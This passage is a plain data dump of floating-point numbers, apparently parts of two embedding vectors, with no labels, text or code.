0.000113193644,-0.019708555,-0.0012603314,0.029243428,0.008631543,-0.015829647,0.010707989,0.024300868,-0.007515711,-0.005638857,-0.005322767,-0.0024962854,-0.011060967,0.023254331,-0.017292015,0.022789352,0.020156523,0.010111124,0.0026867848,-0.001278378,-0.0014403018,0.017383544,-0.0057817297,0.020544926,0.0019639554,-0.029850552,0.006999587,-0.06713007,0.004073416,0.01583005,0.010715769,0.007907596,0.031166704,0.026877208,-0.013072617,-0.0026293283,-0.0068600886,0.0021958915,0.021348668,0.019301664,-0.0040342333,0.002030043,-0.012856895,0.007217074,0.031299863,0.017369099,-0.006002859,-0.015004974,0.01771572,-0.0069789174,-0.0024686442,-0.0074723414,0.0090447,-0.008665571,-0.00571395,0.011496698,0.013151356,-0.049991794,0.012396092,-0.003646249,0.00121668,0.05192193,0.016830131,-0.014718058,-0.002276091,0.02653353,-0.023927938,-0.0031935065,0.015737567,0.021953525,-0.013369844,-0.008993233,0.012967361,-0.007930076,-0.0073050526,0.0013293958,0.012330221,-0.0052315253,-0.0134512745,0.030694641,0.024770144,0.023574688,-0.023084722,-0.012520653,-0.0139938295,0.03365848,-0.019346612,0.011198697,0.009636117,-0.013830845,0.003401194,-0.007429029,0.0013484621,0.005211428,0.0064113843,-0.009458113,0.024188034,0.010144818,0.028961416,-0.0012048554,-0.00020650426,-0.003911964,0.045674272,0.045350373,0.018577084,-0.0042613978,0.0029934975,0.0014253343,0.0046225665,-0.009435802,0.0057571437,-0.00244543,-0.022149388,0.015725108,-0.01681986,-0.018288154,-0.027726991,-0.003642021,0.0026099198,0.0056624454,0.015774252,-0.028580097,-0.004131068,-0.0050990386,0.015883932,0.0019218177,0.022528512,0.00030547386,-0.006399622,-0.011947969,0.012105498,-0.009101752,0.015821401,0.015104724,0.0059706224,-0.007878882,-0.028522061,0.0010977102,-0.010890986,0.014508585,0.017294792,0.008173694,-0.0013956781,0.004769087,-0.0068133986,-0.003197008,-0.0029230097,-0.011777915,0.001625067,0.016956063,0.0097062625,-0.027004788,-0.0016818312,0.013016428,0.012138445,-0.0017323132,-0.035302375,-0.0046141115,0.013781616,-0.025693858,-0.011446026,0.0041112658,-0.025889225,-0.018160274,0.010301171,0.009481483,-0.0076723965,0.018366974,-0.0043716873,-0.0026593963,0.010692309,0.0015090661,-0.043725207,-0.01274925,0.0049480437,-0.008540986,0.017532965,-0.011650024,-0.0043126056,-0.0060828235,0.019964928,0.015085789,-0.0062040407,-0.02210579,0.025047302,0.032642014,-0.01853194,-0.017239518,0.0049178363,-0.0041494085,0.012175627,0.03483325,-0.02056056,0.010697928,-0.0067340974,0.0112807145,-0.0036046023,-0.019587936,0.02855221,0.013228887,0.004385928,0.0088720545,0.0031117469,-0.014812955,0.006359749,0.0026155545,-0.005274988,-0.013374383,-0.00650679,0.019575994,-0.025790563,-0.0051791193,0.0139286,0.02440261,-0.029001866,0.007841741,-0.018163728,-0.006523917,0.012429633,-0.01298986,-0.0076796287,0.01810848,-0.014178563,0.0034350876,0.003715,0.014603013,-0.021742431,-0.01766742,-0.025774349,-0.08472067,0.005888651,0.0093990415,-0.0073721246,0.042778894,-0.008594447,0.008469257,0.0011660454,-0.011414104,0.019153342,-0.0044027395,-0.019050369,-0.006340039,-0.0049361666,0.021096652,-0.012873856,-0.01174505,-0.00020571666,0.005686373,-0.017674152,-0.0099843405,-0.0038560631,-0.008434842,0.0026579339,0.008232651,0.0074789077,-0.004013122,-0.016798252,0.012841232,-0.0033424795,0.0016727269,0.007900525,-0.011902029,0.0074819885,-0.0203361,0.009240455,-0.014015284,-0.0017665598,0.0061852,-0.015940448,0.019689009,0.00069083925,0.011117763,0.010541871,-0.01201372,0.010104751,-0.021515273,-0.014648574,-0.01847087,-0.008234871,0.007597257,0.008409319,-0.0051488,0.032157496,0.022225074,0.011271738,0.016701346,-0.0032016688,0.02724012,0.0006787156,-0.014334255,0.0063355397,0.008480627,0.0013544227,-0.00033889303,-0.011119586,-0.005669933,0.004976831,-0.017882302,0.013974638,0.0069185314,-0.017590228,0.0019747103,-0.0133400895,0.0023277937,0.023684079,-0.0046226825,-0.01066226,-0.015838685,-0.0026315858,0.032566957,-0.0065310984,0.024375854,0.014036752,-0.011173782,0.015133211,0.0008829157,0.010993202,-0.00053524907,-0.02676745,0.009886497,-0.008943085,0.0097800465,-0.0046151835,0.011653238,0.012319223,-0.017318072,0.010679812,-0.030539677,0.0034289684,-0.020180123,0.0019976604,-0.000779321,-0.010079459,-0.025737772,-0.019544674,-0.012383827,-0.01081906,-0.012104446,-0.0027610052,-0.017830491,0.029269772,0.03474545,0.020786269,0.016350362,0.016940605,-0.0055867205,0.009278043,-0.026165143,-0.021989755,-0.027328042,0.006813621,-0.0069870395,0.02060907,0.006795931,0.001059502,0.020120777,0.004403713,-0.017423645,0.029549656,0.012601804,0.018463194,0.010720801,0.010037714,-0.010481189,0.01208057,-0.0138847185,0.019199342,0.00011459182,0.00016891456,0.012412855,-0.006354235,0.00818843,-0.002869839,-0.011050062,0.011740555,0.0072068204,-0.009133146,0.02312478,-0.0116082085,-0.013120134,-0.0057525756,-0.018455124,-0.0018561961,-0.018595055,0.0055633457,0.023202242,0.016777389,-0.0076060668,-0.03792808,-0.007234731,0.026817203,0.0024439555,0.0070206183,-0.007923557,0.000024717787,-0.00047479445,0.00404048,-0.027824027,0.010933109,-0.023866799,-0.02043456,0.008382493,-0.017725302,-0.019723756,0.0015749848,0.016402218,0.03304086,0.0014474142,0.008636629,-0.02888878,0.018298998,-0.0035181495,-0.011853311,-0.007948184,-0.008667269,0.008892448,-0.00059581106,0.014444643,-0.022087824,0.015111321,-0.02301803,0.00013823657,-0.001265146,-0.002061305,-0.009311462,-0.0059398063,-0.007634214,-0.01071963,0.017741093,-0.0076676714,0.021450905,-0.013387326,0.016688136,0.018422632,0.014152753,-0.005063641,0.01599801,-0.015200856,0.010087495,0.0076708994,0.022643656,0.021101888,0.10896579,0.000019263567,-0.0025898349,0.00079566776,0.016085727,0.025774408,0.0044132243,-0.0062024146,-0.015742378,0.012694621,0.012286414,-0.0030700217,0.0025268022,-0.0079907235,0.0014289864,0.019460972,0.009009739,-0.02572068,0.007972261,0.006593942,0.0031114067,-0.018667812,-0.008704398,-0.037547916,-0.0021193936,-0.0727796,0.016714828,0.029297559,-0.00602326,0.04439342,-0.0011574276,0.007244044,0.01925757,0.010680598,-0.0057683475,0.010283917,0.00888608,-0.029229134,0.0024029831,0.004218594,0.026082257,0.014459098,0.0016454757,0.0035743697,-0.021275131,-0.008521545,0.0009956902,-0.012665466,0.015461261,-0.017528143,-0.004813329,-0.0004861517,0.025136525,-0.0002918975,0.025367716,-0.012141509,0.005207557,0.0011205717,0.014564969,-0.013633358,0.026465721,-0.002069459,-0.0015573398,-0.013808127,0.0076355995,-0.014804034,0.0048090722,0.00035878664,-0.021885999,-0.00660289,0.012750452,-0.0024983394,0.006960557,-0.0020284955,0.0031574036,0.03242547,-0.010466191,-0.008896286,-0.009175178,-0.018981082,0.0086616585,-0.00028596565,0.019232571,0.027570127,0.0040986906,0.003894708,-0.017478501,0.025390863,0.0031680972,-0.005128479,-0.019332686,0.011417958,0.015167657,0.011264296,0.0070146746,0.001755958,0.037713937,-0.031884655,-0.0072916574,0.01754463,-0.014867219,-0.020671993,0.008041646,0.004431543,0.006483649,-0.011878374,0.0033370291,0.028720554,0.011977262,-0.011682095,-0.009488143,0.012767086,0.0071740495,0.018703545,0.010475933,0.04382395,-0.035861176,-0.02423568,0.008044848,-0.008294275,-0.013732768,0.023858683,0.029367365,0.039198402,0.0107677085,0.013603492,-0.013523356,0.0032737928,-0.012804246,0.010603659,0.0006839966,-0.038443685,0.0021553321,0.040583394,0.0042145867,0.022774963,0.020814143,-0.011869699,0.0024997948,0.0050689178,0.02262035,-0.0017697456,0.0015220927,0.021258814,0.0069343094,-0.019143624,0.026248425,0.010653175,0.007255056,-0.0034419303,-0.001759641,0.014820615,-0.007001771,-0.015787035,0.002825474,-0.015967468,-0.014751018,0.014336576,-0.009217855,-0.02504553,0.009286122,-0.0004352817,0.017045403,-0.035989553,0.004603056,0.01416258,0.008335748,0.000052415486,-0.0026950338,0.0035980537,0.0029235517,-0.014319216,0.0035097492,0.0046240077,-0.022354929,0.0022352084,0.004829858,0.017519223,0.013847825,0.0066243294,0.026142241,-0.010376732,-0.016531441,-0.014186557,-0.004203275,0.0058497214,0.011745967,-0.0066412785,-0.03121899,0.0068363626,0.002596788,-0.0026269495,-0.006326132,0.02512868,-0.003999738,0.024608802,-0.020292018,0.013721752,-0.024538549,-0.03350533,-0.004034789,-0.00082943233,0.008656923,-0.009006677,-0.00053663575,0.00842063,0.003484289,0.0024326236,0.005959354,-0.021374485,0.020439828,0.010015501,0.008541693,-0.023053378,-0.0054669846,-0.0061170836,-0.00016035463,-0.020072812,-0.014840043,-0.015815465,0.00038495302,0.0042657154,0.010274367,-0.00019352004,-0.03413632,-0.026424412,-0.024282048,0.00684953,0.0135807535,-0.029888732,-0.0016571856,0.0056813285,-0.012432111,-0.017492348,-0.017314987,-0.022247646,0.02422645,0.009932822,-0.0045714183,0.04033827,-0.0045372928,-0.002557079,0.0087916525,0.008517367,-0.017142402,0.0007372557,-0.0056312764,-0.0013658102,0.00081019354,-0.0019665791,-0.018770255,0.005957531,-0.019432697,-0.01485293,-0.016901543,-0.0055086124,0.021969391,0.025162136,0.03027349,-0.0053699235,0.0022897418,-0.0015757423,0.006092276,0.009659433,0.00043764684,0.00052646716,0.0014207488,-0.009956474,-0.0028503535,-0.014265604,-0.01122709,0.008399967,-0.0063997814,0.022224171,0.0023379964,0.020487322,-0.0036208502,-0.0153471865,-0.004508985,0.0037333684,0.014023352,-0.029651199,0.012492395,-0.017347401,0.015278261,-0.025457827,0.010971379,-0.016413825,0.060414407,-0.05066023,-0.0040415265,0.016801827,-0.0024868299,-0.009118263,0.007996536,0.019186668,-0.023796484,-0.022373382,0.01449644,-0.002046529,-0.011353921,-0.01731095,-0.010843145,-0.0035733613,-0.018558625,0.016148955,0.011368161,-0.0009323895,-0.009124123,0.013211335,-0.004909479,0.000956711,-0.0044027837,0.00274099,-0.007276816,-0.00675569,-0.007931677,-0.016914275,-0.00080121704,0.015983105,0.02190887,-0.024526758,0.0035227644,0.029129185,0.007831866,0.025231933,0.013416663,-0.035198525,-0.03315198,-0.01359283,0.007364467,-0.012812559,-0.01842733,-0.039209858,-0.010804239,-0.000005081523,0.010479549,0.13281597,-0.019968927,0.0054978374,-0.0054733697,0.0049466477,-0.012401274,0.03330026,0.019165328,-0.017241444,0.011038127,0.016259423,-0.0041046264,-0.00008338829,0.02773048,-0.010584767,0.0044395686,-0.0032408827,0.163876,0.00052373414,0.011050183,-0.0088481875,0.0012294963,0.0040138112,-0.00040775482,0.007601203,-0.052134603,-0.012606857,-0.02182772,-0.031721994,0.0016035542,-0.025711095,0.016010888,-0.0045426474,0.0056691356,-0.0020611612,0.0069570593,0.011262053,0.004336707,-0.019369666,0.005734455,0.002624701,-0.014314467,-0.022364076,-0.018576773,0.0073204054,0.013821424,-0.029068014,-0.00792377,0.0048302202,0.04882952,0.006543891,-0.014894117,-0.005878866,0.017176116,0.032950856,0.0033261313,0.018708125,0.007739037,-0.048248854,0.026169505,-0.0077376263,0.023327455,-0.020506043,0.027824353,-0.0041388124,-0.004293077,-0.022034673,0.0039814757,-0.006441666,0.012439814,0.0014053277,0.009661907,-0.014529187,0.006154475,0.04399408,0.022497145,-0.0151563985,0.0052987994,0.010421434,-0.003872434,0.023397699,0.01664213,-0.020209184,-0.006388435,0.006535583,-0.024109151,-0.018507287,-0.004392871,0.01835504,-0.005957954,-0.012672108,-0.0031546867,0.0005004797,0.005162505,0.03164301,0.033500724,0.009586226,-0.005662898,-0.006986506,-0.010537193,0.007687214,0.012911008,-0.0031860322,-0.002259771,0.009834857,0.013579692,-0.020511268,-0.013451216,-0.0017584228,0.0059521827,0.013884591,-0.0038808114,-0.00747587,0.0063895364,0.010251804,-0.0052847704,-0.0047438573,-0.011850384,-0.039128307,0.0006732993,0.0056252037,-0.02127816,0.0013763941,0.015928015,-0.021100452,0.0020686116,0.012667125,-0.0013397671,-0.012532775,0.013268568,-0.015315243,-0.0009202676,0.000042636715,0.046204265,-0.0029272623,-0.018933266,-0.0033286873,-0.047479957,-0.016279982,-0.004819687,-0.00825992,0.016347947,0.012922211,-0.0021310698,-0.011237929,-0.0002594531,0.005978813,0.014276124],[0.0029138713,0.021535823,-0.015618837,-0.021198023,0.017888239,-0.013836261,0.004730393,0.02167878,-0.0027933226,-0.006549336,0.0031722765,0.017275995,0.008074409,0.009465253,-0.004370235,0.01055761,0.009150015,0.020116694,0.009509967,-0.0048779952,0.004103894,-0.011225826,0.01154393,0.013725337,0.008596312,-0.0070167943,-0.009438554,0.0050604874,0.018368216,-0.0013105983,-0.008114164,0.029138895,0.0022477878,0.0045922077,0.029099522,0.007706095,-0.027196812,-0.020707712,0.008555327,0.006411845,0.005747086,0.038739555,-0.01602297,0.0379191,0.012719131,0.01073454,-0.020073742,0.004175123,-0.0076421127,0.021180095,-0.0038363205,-0.0025358605,-0.053056266,0.017631857,-0.01635789,0.009769726,0.0024067224,-0.037689023,0.01812854,-0.015657855,0.0034978762,-0.0037674354,0.0073941476,-0.025550706,0.030805333,-0.0006789308,-0.008168541,-0.017804652,0.010941957,-0.0073492276,0.021445697,-0.006384224,0.0033682787,-0.0016593679,0.02051639,0.010264751,-0.007902645,-0.0030925993,-0.012527843,0.009206177,-0.021291634,0.0037199762,0.010170926,-0.004159239,0.015478663,0.023328329,-0.0034442744,0.0022636345,0.0006132848,-0.018174022,0.0020487818,0.011481231,0.011288806,0.004348703,-0.0041045486,0.015618291,0.0029980552,-0.0147462785,-0.014680767,0.015785204,0.009358375,-0.0063321795,-0.02306776,0.015763752,-0.007934597,-0.011317221,-0.000029331472,-0.0060693305,-0.014023591,-0.0076059066,0.005195155,0.01656038,0.0012852659,0.0035943517,-0.0013797913,-0.0054240827,-0.0062244195,0.01092437,0.030654589,0.0331844,0.0040557156,0.029208703,0.0136045255,0.0022852658,-0.010522852,-0.009170267,-0.007920287,0.014211755,0.004247705,0.006098492,0.0024583545,-0.000981885,-0.0075919256,-0.0051781503,-0.0018396223,-0.0025231177,-0.0020157925,-0.011590415,-0.0000116179635,0.0056094197,0.017353216,-0.011460256,0.013834354,-0.0105944965,0.005964584,0.020445865,0.0025237952,0.014514824,0.017743383,-0.03130119,0.012020267,-0.0053291405,0.013622612,-0.011996521,0.000414781,0.011001098,0.0077548823,-0.03262169,-0.010264703,-0.028301856,0.022855997,-0.014670245,-0.014173068,0.0036460233,-0.022909572,-0.017343557,-0.016127365,-0.00003103746,-0.011719825,-0.0024879805,0.02206557,0.03565616,0.010165145,0.0090185655,-0.018212572,0.020380361,-0.004384239,-0.010950458,-0.0061896387,0.010844903,0.015823094,0.013612065,-0.03284045,-0.024612129,-0.031852596,0.028520642,0.016544092,0.0072744424,-0.010824911,-0.0046095992,0.005701133,-0.004492763,0.0055758385,0.0009141899,-0.012696759,-0.018292466,-0.020440642,0.097567886,-0.014337583,-0.010510769,-0.019658504,-0.010228737,0.010655607,-0.042835783,-0.0005734681,-0.0198776,-0.0016434523,-0.008198446,0.005619715,0.004060486,0.016150704,-0.011415837,-0.0066782106,0.018729832,0.01641566,-0.06418966,0.019361952,0.00029668186,0.0061469385,-0.016045861,-0.023209874,0.0037100445,0.0070667337,-0.019219795,-0.0041452753,-0.013089328,0.0017178609,0.0036492886,-0.013165327,-0.013906385,0.017937265,0.0024543642,-0.0039492995,-0.024987837,0.01977531,-0.024522992,-0.0007217365,-0.003898358,0.005142202,0.0072050104,-0.009273104,-0.008282801,0.018708292,0.006596271,-0.017880645,-0.028317647,-0.012781519,-0.009364513,-0.01314966,0.019853413,0.007404863,-0.014935404,0.0342919,0.023536537,-0.012386134,-0.026400303,0.019326946,-0.015503587,-0.0006157055,-0.013065984,0.032455567,0.035684012,-0.019840265,0.016206533,0.016902007,0.0032781158,0.0083103245,-0.020110358,0.009801535,-0.01710842,-0.020492306,-0.0009863484,0.011787058,-0.0011950674,0.0054726764,0.0035483642,0.005909193,-0.002773528,0.020792965,-0.007846989,-0.003964774,0.013777761,0.004546717,-0.036796976,-0.008725897,0.020795008,0.011344325,0.023794249,0.01950476,-0.009622442,0.008957142,-0.0045252508,0.018593214,0.009496703,-0.022988072,0.0024030756,-0.02557853,0.039030015,0.033735503,-0.018768331,0.005386504,0.00800874,0.015714375,0.0013502295,-0.004177264,0.014931283,-0.019072324,0.021987282,-0.027199714,0.023006015,-0.045820516,-0.01903355,0.0051280768,0.0028941643,0.018864261,0.011320056,-0.0038357293,-0.0084546935,-0.03273282,-0.019855741,0.00451493,-0.0033119551,0.019611314,-0.015261039,-0.02206743,-0.002555634,-0.0034875192,-0.024403937,0.0049649216,0.00056136627,-0.013785714,-0.015717318,0.014194233,0.012101377,-0.047623567,0.014873601,-0.014608279,0.020206193,0.012909231,-0.003395834,-0.013962797,-0.011372685,-0.0136322,0.017074928,-0.009131578,-0.022864012,0.0029566272,-0.0042697308,0.011490138,0.0032159386,0.010410796,-0.03983302,-0.019852571,-0.018227553,-0.03006991,-0.009319706,-0.0010294882,-0.010343888,-0.008415164,-0.00726752,0.025624162,-0.024854295,0.00038596932,0.0013558683,0.084468834,0.011233743,0.0013318936,0.010854852,0.0012939551,0.024574723,0.02340999,0.02254009,0.01607263,-0.00083759974,-0.02330034,0.018093849,0.0011834962,0.028462028,-0.007311924,0.005948805,-0.029756054,-0.030449051,-0.030827912,-0.027639043,0.02666714,0.0038680176,0.0048319404,0.013477945,0.019519316,0.020932509,0.017039696,-0.0071276664,-0.012061956,-0.023484921,0.010284739,0.018766874,0.02524854,0.012237266,-0.027906656,0.010018789,0.036580488,-0.0055778977,-0.028533302,-0.0026829382,0.010084995,0.012223663,-0.011176467,-0.0082765985,-0.0100886375,0.040573288,0.007306667,0.0013764062,-0.029434985,0.016834762,-0.008276441,0.009786329,-0.010165267,0.006244244,-0.0072551267,0.010258562,0.016266845,-0.028658764,0.041487917,0.023709768,0.011762981,0.030412098,-0.0035771132,0.004504256,-0.0031446132,0.018894166,-0.0075853714,-0.0050747427,-0.015550222,-0.0027152163,0.011740357,0.0104321055,-0.011401221,0.006725491,0.010360777,0.005526806,-0.0012651827,-0.024492575,0.0040360577,0.037731364,-0.025483713,-0.016461434,-0.0063945916,0.007528905,-0.004194166,-0.0043473328,0.004240263,0.0063644084,0.04139634,-0.025550164,-0.0030114052,-0.0096493885,0.020563522,0.0095486455,0.0021651995,0.010941657,0.012992264,0.01442733,-0.007882861,0.01273937,0.011264948,0.009029725,-0.025246806,-0.010620838,0.0096326,-0.0033584156,0.010430516,0.0030108178,0.004763012,0.039462995,0.0024079785,0.00485997,0.0029921366,-0.021995815,-0.015122927,-0.017556021,0.003974893,-0.0077256397,-0.015172945,-0.003945428,0.026940154,0.005046391,0.00563546,0.008883318,-0.01081127,0.010853872,-0.009631476,-0.03310458,0.005649223,0.0066951094,0.015439756,0.018180491,0.0106190415,-0.024737852,0.038243324,0.003975403,-0.020298302,-0.013139515,0.026459621,0.019482117,0.005416107,0.014960692,0.014362195,0.00035332897,0.0076576895,0.034047388,0.04801085,-0.0087620085,-0.019291755,0.006610935,-0.0074503785,-0.0091221,0.031858552,-0.02616192,-0.0036503177,-0.004934977,0.027299602,-0.011979276,0.0018452249,-0.026675066,0.030994106,-0.007441974,0.006853042,0.0029832774,-0.018549748,0.026814668,-0.007266862,0.05964952,-0.0063982042,-0.037067793,0.0014500404,0.024115121,0.0031241493,-0.004647896,-0.0019726285,-0.014432028,-0.005447365,-0.014767516,0.022299312,-0.002657702,0.039241467,0.0079301745,-0.0038813837,-0.008713405,0.030601779,-0.014049531,0.006266614,-0.0072632423,-0.005610664,-0.029546006,-0.015749827,-0.017099816,0.012655648,0.022663977,0.0035164778,-0.03454561,0.00397104,-0.006012631,0.012220575,0.02229805,-0.007329892,0.010052532,0.00939834,0.011603135,0.014858442,0.0094226645,0.034661528,-0.0010805005,-0.0038880317,-0.013434741,0.025114916,0.024152482,0.0057947007,-0.0013172411,0.009545627,0.035079718,-0.0015965492,-0.019710476,0.019427873,0.028898804,0.017864874,-0.003494304,-0.00993607,-0.008352934,0.01007318,-0.019421306,-0.0011325509,0.014557154,-0.015523998,-0.03630063,-0.025921084,-0.028279565,0.00546893,0.011530239,-0.01507426,-0.0037245755,-0.02367488,-0.0032218255,0.023607278,0.002903808,0.0003663917,0.004936631,0.017327465,-0.003114725,0.015244163,0.0041948585,-0.01635234,-0.008643359,0.007855903,-0.0050184713,0.009671124,0.0042450354,0.006339717,-0.012806939,0.016204923,-0.0010756801,0.015189126,0.009196888,-0.022239976,0.0054188007,0.0017980847,0.022943396,-0.012954516,0.0056944056,-0.03151175,0.0021933257,-0.026852416,-0.011178931,0.0019634932,-0.01996705,0.03201425,-0.0017249738,0.0063576424,0.003063766,-0.009638906,-0.0018551069,-0.002381078,0.01557422,-0.033138886,-0.006785202,0.00564588,-0.0066664335,-0.020530982,0.029100345,0.025630753,-0.006269074,0.0079168305,-0.016055554,-0.012041252,0.0104602175,-0.010931146,0.017189043,0.014326641,-0.0005199684,-0.03127778,-0.005366915,0.0009709488,-0.0582459,-0.010683621,0.03347589,0.010602382,0.011289802,0.0073789065,-0.000019627778,-0.010157044,-0.01022683,-0.0019437532,-0.028807689,0.008309241,-0.007030487,-0.019708615,0.015033146,0.007749798,-0.008350495,-0.0059670424,-0.023655705,-0.00024094769,0.0027756586,0.021054715,-0.032463208,-0.0054895994,0.014600762,-0.004432396,0.017596696,-0.014432235,0.011528553,0.010960189,0.012379845,0.004774328,0.005412806,-0.005769834,0.008556367,-0.03815503,0.017579192,0.008935672,0.03875915,0.018753428,0.009097885,-0.004356879,-0.00067945267,0.02454634,-0.015286207,-0.020241594,0.020233203,0.024096182,0.004296592,0.0034413885,-0.012070691,0.014256882,0.0040961136,-0.00035007467,-0.009861312,0.011485026,0.0058132885,0.003327986,0.02574204,0.0016181392,-0.0014277413,-0.03062243,-0.023638032,-0.012616572,0.010912864,0.02071491,-0.004802843,0.013220258,0.016277838,-0.0047786287,0.00038279986,0.011662602,-0.012728852,-0.0076991087,-0.019437311,0.026359132,-0.010876397,-0.010690475,-0.047251247,0.020759597,0.031286888,0.013869514,0.016064802,-0.0042144787,0.010325828,-0.00055652624,-0.011653421,-0.012621723,-0.0364556,-0.012397779,0.022048933,-0.026562167,0.016924566,0.009176933,0.0066307746,0.018609298,0.016376376,0.00048026067,-0.018116679,0.008505046,-0.013754351,0.0016439266,0.0154700745,0.026828032,-0.0010851442,-0.0028573258,-0.02056877,0.002753567,-0.0044345027,0.008864414,0.005521488,0.028522983,0.0037640147,0.023655476,-0.011366748,-0.019954747,-0.018979546,0.013467602,-0.046844173,-0.013142242,-0.0061508636,0.017531877,0.007287282,0.018731983,-0.009934062,0.02817699,0.018142771,-0.0054817633,-0.0014352694,-0.0026953402,-0.00023610561,0.011206526,0.027570719,0.004294259,-0.043531846,-0.008758003,0.031277444,-0.00042025588,0.020244075,-0.019369246,-0.021315675,-0.028424898,-0.025181254,0.010621204,-0.0029455265,0.004475154,-0.005620892,-0.042561557,0.04326916,-0.011716414,0.014870094,0.008539412,0.0041944315,0.013448886,-0.008019356,0.0039049294,-0.01607128,0.015916718,0.0073929513,-0.021683522,0.0010417438,0.020470763,-0.027044045,-0.0058988524,-0.035842407,-0.0058859875,-0.015675172,0.0040564183,-0.014112423,-0.005233359,-0.011551377,0.027731748,0.0017132262,0.0047356016,-0.026331317,-0.027895795,-0.008976567,-0.0067430343,0.019144125,0.008551976,-0.0059731347,0.028969798,-0.037066035,-0.004089915,0.012416226,-0.021557186,0.017504582,-0.0075898645,-0.0012754733,-0.012655452,-0.012428893,0.021946158,-0.019918635,-0.00032214148,0.027913295,0.0065791095,0.0011611037,0.014554701,-0.0114716785,-0.019230941,0.006295934,0.017037993,-0.023932675,-0.0032490038,-0.007055375,-0.0069251196,0.01671541,-0.0059616626,0.020097414,-0.0042408346,0.008595504,0.01668647,0.010449171,-0.038059346,-0.0031828396,0.00091164635,-0.008518972,0.0152312955,0.005473416,0.004700194,0.017916204,0.030175049,0.003900387,0.014739361,0.015039917,-0.0055462676,0.0024460482,-0.008754772,0.0027615584,-0.011277146,0.008291153,0.025531238,-0.028204897,-0.008743112,-0.0035766915,-0.021934707,0.008285212,-0.025000837,-0.009598939,0.008207809,0.012277873,0.0042657712,-0.0024116132,-0.01614763,0.009216392,0.0020033775,-0.009663227,0.005763816,0.0040068533,0.0148513215,0.00015639524,-0.010335762,-0.0014534167,-0.011649149,0.012491803,-0.0031826466,0.0051069674,-0.0015846043,-0.015055152,-0.0010305168,0.0005897232,-0.017743582,0.013401615,0.03641394,0.006817788,-0.006581609,-0.017372666,-0.024568098,0.013578804,-0.007270953,0.0005124235,-0.0032448138,0.01822949,0.010344397,-0.012208125,-0.004038701,0.003008905,-0.06715064,0.01748053,-0.015933214,0.005880267,-0.0011496452,-0.007966404,0.0015866313,0.0007668084,0.022871096,-0.012209062,0.031019093,-0.0022653863,0.01361316,0.0067005446,0.0019076167,0.0131012015,-0.013130046,0.016662162,0.008679642,-0.0040948326,0.013917138,-0.004640379,0.007713741,-0.010867718,0.015352326,-0.008197709,-0.0034549288,-0.0057437127,-0.05303124,-0.0128917005,0.009147909,0.014131969,0.00034026837,-0.014788118,-0.009957922,-0.017793998,-0.0016049119,0.02034415,-0.022992862,0.014620643,0.0028791828,-0.005285344,-0.009827788,0.026011705,-0.031379357,-0.014974175,0.029049614,-0.025376523,0.0036897766,-0.0028946989,0.04603638,0.0076594837,-0.0022695381,0.027904954,0.015357724,0.024300553,-0.016940264,0.017035581,0.014655848,-0.009548309,-0.0041832263,-0.008950293,0.0057474384,-0.0005372266,-0.028069336,-0.01666484,-0.020834027,0.019756304,-0.0013628824,0.009239412,-0.026592862,-0.009259493,-0.010960454,0.0033845732,-0.017976789,0.017654106,-0.014523847,-0.0122013595,-0.007894995,-0.010304044,-0.010466678,0.014700473,-0.018759752,-0.003712829,-0.023592027,-0.013633564,0.004026794,0.004579904,-0.003451398,-0.014569425,-0.004273254,0.0026763515,-0.019213714,0.009793916,0.0016740777,0.017724078,0.005108348,-0.010536045,-0.013666364,-0.0029647737,0.0005548611,-0.005134386,-0.012865041,0.060057774,0.0086497525,0.0005029041,0.010211932,0.012892564,0.01143348,0.008293022,-0.013051615,0.017374141,-0.02301608,0.02161493,0.014901401,0.003057135,-0.009732829,0.004682483,0.020791253,0.03609101,-0.00038240317,-0.016807908,0.001680905,0.010635115,0.0031344309,0.005564479,0.015105452,0.008289058,-0.024134483,0.0050881766,-0.004007613,0.02931289,0.027328795,0.00062001724,0.022957273,0.0053439774,0.021317242,-0.020523971,-0.004322435,0.00108122,-0.01618919,-0.0021804117,-0.009940987,0.012490165,0.010249889,-0.009462848,0.0077108718,0.009141897,-0.009821831,-0.0015531587,0.0036349504,-0.0040063215,-0.0015152579,0.00089272176,-0.007700302,-0.014978308,-0.009864201,-0.0012598231,0.007508007,0.01992793,-0.010573037,-0.023469234,0.008264812,0.011092732,-0.014625809,-0.0041884314,-0.010396717,-0.0070928754,-0.020146176,0.0011857875,-0.0060548396,0.003312533,0.0003175822,0.020432955,-0.007865147,0.007844897,0.03619824,0.023546878,0.0003960499,-0.008163126,-0.0055974727,0.023505708,0.018637089,-0.014942941,-0.0041112583,-0.01274773,0.0010692376,-0.03500329,-0.006796589,-0.0039699194,-0.00010970394,-0.009229462,0.01028513,-0.0040601953,-0.026602937,0.018914834,-0.008565843,0.024707139,-0.0009884709,-0.0068031233,0.010848201,0.004137996,0.018362734,0.011888829,-0.014793287,0.00429182,-0.009514521,-0.019779243,-0.001791136,-0.0011196029,0.00915771,-0.0029855527,0.0034983875,-0.027123608,-0.02281884,0.00858167,-0.00677127,-0.00028722495,0.022888545,-0.024926305,0.015735181,0.023836192,-0.004098159,0.012469889,-0.0016999379,-0.016928857,0.054135073,0.0060600624,0.008128199,0.008151714,0.029014412,-0.008403837,0.030953046,0.027317202,-0.027082453,0.0038969335,-0.00976701,0.007847318,-0.008577164,-0.013312831,0.010181989,0.027355192,0.02088134,-0.010270037,-0.014150948,0.018221859,-0.002666967,-0.0069743246,0.025290875,0.028832303,0.007936983,0.005102616,0.010067358,0.005765812,-0.028553566,0.014218346,-0.014679738,-0.01182569,0.013053694,-0.026788792,-0.010191004,-0.0023355074,-0.023332797,0.0032989352,-0.0068684984,0.01606779,0.018823996,0.023536362,0.001196416,0.02049913,0.0016450639,0.0004404874,-0.027654178,-0.0018084577,-0.02138705,0.016682215,-0.013719902,0.011602131,0.021223528,0.00977931,0.005031375,-0.0018296824,-0.016775658,-0.051878344,0.014803469,0.0259617,0.0014730698,-0.007026389,0.017492255,0.0062222723,-0.01888811,-0.020975862,0.006809913,-0.0061056917,0.002356629,-0.011447417,-0.0041574063,-0.018041186,-0.0065589943,-0.025275314,0.048412144,-0.015581504,0.020811617,-0.023032652,0.024050364,-0.016729921,-0.0019483868,0.0020300345,0.011112166,-0.025340084,-0.026607115,-0.022513244,-0.0021455286,-0.019026961,0.00040057887,-0.0005567623,-0.0006390851,-0.02318937,-0.01165195,-0.01234139,-0.003438018,0.008254656,-0.004477306,-0.016601345,-0.0013618651,0.013895723,0.005738493,-0.02483396,0.012476215,-0.006269639,-0.004726892,-0.007021575,0.033923544,0.017298928,0.004394013,0.0040676184,0.010113819,0.0024959075,-0.015165372,0.0081639085,0.004651719,-0.021310316,0.040519696,0.005557092,0.0072819293,-0.03230255,-0.002279506,0.0009549334,0.017886128,-0.0077868276,0.020992547,0.006115303,-0.014748305,-0.015068616